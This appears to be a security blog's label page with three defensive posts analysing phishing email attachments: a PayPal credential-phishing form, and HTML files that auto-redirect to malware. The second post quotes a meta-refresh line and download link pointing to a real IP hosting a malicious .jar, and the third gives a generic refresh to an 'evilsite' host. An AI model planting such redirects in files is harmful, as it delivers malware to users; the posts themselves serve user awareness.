Showing posts with label HTML. Show all posts
Showing posts with label HTML. Show all posts

Monday, October 26, 2015

Walking Thru a Phishing Email Attachment

Here's a walk-thru of how I look at a Phishing Email Attachment.

There was a McAfee alert 'HTML/Phishing.b' on a file called 'form.html'. This likely came from a user opening/clicking on an attachment in an email.

Since McAfee marked as Infected and deleted it, the file was no longer in the original folder that the alert had triggered. But it was in the McAfee Quarantine folder as a .bup so I was able to extract it like this.

The file that came back was this ugly javascript, obfuscated and hard to read. Just at a high level, if you look at this document it contains this massively long Base64 encoded variable which is then decoded and de-obfuscated by the ugly javascript into some working HTML code that the user's browser or email client would then display.

I know this because I see at the bottom the javascript command 'document.write' which is used to write raw HTML to a page. Now to be safe, I didn't want to run this javascript directly, so I re-saved this javascript and changed 'document.write' to 'console.log'. What this does is allow me to see the HTML without actually having the browser render it (much safer). Then I hit F12 to see my firefox developer tools, re-load the javascript, and see in the console tab that the HTML is now outputted for me.

After the javascript runs, the HTML displayed is this. It's an HTML form styled nicely to phish Paypal credentials and send them to an .ru (russian) website.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , , , , ,

Tuesday, March 31, 2015

Phishing Email Example Walkthrough

I recently posted a phishing email example. I thought it'd be interesting to quickly walk-through what it's doing.

The Subject 'FW: Remittance reconfirmations' tries to draw your attention by looking like a previously forwarded email, and containing talk about payments/remittance.

The Body is actually playing on your friendly side saying 'Kindly Verify the attached remittance and purpose.'

The attachment seems pretty benign in nature as it's named 'Remitance004.html'. But don't be fooled, even '.html' files (as I've blogged about before) can be dangerous.

Top Urgent!
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello

From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com

Subject: hello
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello

As seen above, the body of the email makes it look like this was forwarded over and over to multiple people, giving it some legitimacy.

But once we look into the attachment ('Remitance004.html') we are able to confirm that it's really just a malicious phish attempt.

<META http-equiv="refresh" content="9;url=http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar"> >

The above code should tip you off as bad, because this line of code says that if you open the html file in a browser, it will not display the contents, but instead automatically redirect you to this '.jar' file which will prompt for downloading. '.jar' files are dangerous. Think of them as executable zip files. They'll probably kick off a storm of activity on your pc that will ultimately end up compromising your system. Don't open '.jar' files unless you know what you're doing.

<span class="btn"> <!-- on click file will be downloaded--> <a href="http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar" class="small radius button btn_red"><b>Download</b></a> </span> >

Otherwise, if you open it just in your email client, you will be shown a pretty looking page, and the code above shows that part of that page will contain a button that if you click on it, it'll load the same malicious jar file.

Don't open emails from people you don't know, especially if it's got an attachment.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , , ,

Monday, March 16, 2015

Malware in a .html File

When you receive an email with an attachment, you might be extra cautious if the attachments ends in certain extensions like

  • .EXE
  • .ZIP
  • .BAT
  • .PS1


You might even be a little concerned nowadays with some more common extensions like

  • .PDF
  • .DOCX
  • .XLSX
  • .PPTX


But how many of you would think that the following extensions are concerning?

  • .htm
  • .html


Long story short, you should. You may think you're loading a local harmless HTML file, but here's an example where you'd actually be loading an evil file from a separate site and maybe you wouldn't even know it. If the .htm/.html file contains the following ...

<html> <meta http-equiv="refresh" content="0; url=http://www.evilsite.com/evilfile"> </html>

Don't open files you weren't expecting, from people you're weren't expecting to send it.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)